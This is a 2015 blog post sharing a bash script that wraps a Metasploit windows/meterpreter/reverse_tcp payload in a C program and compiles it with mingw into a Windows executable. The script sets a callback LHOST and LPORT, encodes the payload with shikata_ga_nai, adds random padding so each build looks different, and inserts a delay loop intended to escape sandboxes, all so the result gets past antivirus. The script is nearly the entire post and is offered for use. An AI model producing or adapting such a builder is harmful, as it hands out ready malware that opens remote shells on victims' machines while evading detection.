Friday, May 29, 2015

v3 bash script builds C program with metasploit payload to bypass AV


This version has been deprecated and a new up-to-date version can be found at this post.

Today I added a little more polish to my bash script that builds a compiled C program from a metasploit payload, compiles it with mingw, and then allows you to execute it on the remote host.  I have also made it more user friendly and easier to manipulate the values.  Some techniques to make it more random were also included.

#!/bin/bash

# This program compiles a C program with a meterpreter reverse_tcp payload in it that can then be executed on a windows host
# The program is setup to create a C program after it is compiled that will bypass most AV's
# You may need to install the following on Kali Linux to compile the C to an Exe - "apt-get install gcc-mingw32"
# Below are the only parameters you should have to change

payload="windows/meterpreter/reverse_tcp"
payloadLHOST="172.18.132.16"
payloadLPORT="33890"
msfvenomBadChars="\x00\xff"
msfvenomEncoder="x86/shikata_ga_nai"
msfvenomIterations="3"  # Recommended value: 3

randomness=200 # The higher the randomness the larger the binary will be
delayRandomness=32676 # The higher the delay the longer it will take to execute the payload, may increase your chances of escaping a sandbox

currentDir=`pwd`
outputDir="${currentDir}/output/"
outputExe="${outputDir}prog.exe"  # You can change the name of the executable on this line

cProg="${currentDir}/prog.c"
cProgTemp="${currentDir}/prog.c.temp"

# Create some padding to be compiled in the C program this adds randomness to the binary
function generatePadding {

    counter=0
    randomNumber=$((RANDOM%${randomness}+37))
    while [  $counter -lt $randomNumber ]; do
        echo "" >> $cProg
randomCharnameSize=$((RANDOM%5+12))
randomPaddingSize=$((RANDOM%1024+2048))
        randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomCharnameSize}`
        randomPadding=`cat /dev/urandom | tr -dc '_a-zA-Z0-9' | head -c ${randomPaddingSize}`
        echo "unsigned char ${randomCharname}[]=\"$randomPadding\";" >> $cProg
        let counter=counter+1
    done
}

# Check to see the output directory exists
if [[ ! -d "$outputDir" ]]; then
    mkdir $outputDir
fi

echo ""
echo "You may see multiple errors until the executable is compiled successfully."
echo ""
if [[ $msfvenomIterations > 3 ]]; then
echo "Most of the errors are due to the msfvenom iterations value is set too high."
echo "Recommended value: msfvenomIterations=3"
fi
echo ""

# Check to see if the executable was previously created
if [[ -f "$outputExe" ]]; then
echo "Remove the executable at ${outputExe} to recreate it."
echo ""
fi

# Warn if the gcc-mingw32 package is not located here /usr/bin/i586-mingw32msvc-gcc
# You may need to install the following on Kali Linux to compile the C to an Exe - "apt-get install gcc-mingw32"
if [[ ! -f /usr/bin/i586-mingw32msvc-gcc ]]; then
echo "The gcc-mingw32 package appears to not be installed because /usr/bin/i586-mingw32msvc-gcc is missing."
echo "Run 'apt-get install gcc-mingw32' to install it on Kali linux"
echo ""
fi

# Until the prog.exe is compiled successfully loop until it is
while [[ ! -f "$outputExe" ]]; do

    # Delete the c program and recreate it
    rm -f $cProg

    generatePadding

    echo "" >> $cProg
    echo "int main(void)" >> $cProg
    echo "{" >> $cProg

    # Introduce a couple of processing loops for a delay
    echo "" >> $cProg
    echo "int z5 = 1, r3 = 1;" >> $cProg
    echo "for ( z5 = 1 ; z5 <= ${delayRandomness} ; z5++ )" >> $cProg
    echo "   for ( r3 = 1 ; r3 <= ${delayRandomness} ; r3++ )" >> $cProg
    echo "   {}" >> $cProg
    echo "" >> $cProg
  
    generatePadding
  
    echo "" >> $cProg
    msfvenom -p ${payload} LHOST=${payloadLHOST} LPORT=${payloadLPORT} -b ${msfvenomBadChars} -e ${msfvenomEncoder} -i ${msfvenomIterations} -f c >> $cProg

    generatePadding

    echo "" >> $cProg
    echo "((void (*)())buf)();" >> $cProg
    echo "" >> $cProg

    generatePadding

    echo "" >> $cProg
    echo "}" >> $cProg

    cat $cProg | sed 's/buf/yiopl/g' > $cProgTemp
    mv -f $cProgTemp $cProg
    # To install the following program on Kali Linux - "apt-get install gcc-mingw32"
    i586-mingw32msvc-gcc -o $outputExe $cProg

done

No comments:

Post a Comment

Powershell - Gather Mapped Drives from a List of Computer Names

I created the following Powershell script to gather remotely the mapped drives that users had in their profiles.  I had to create the script...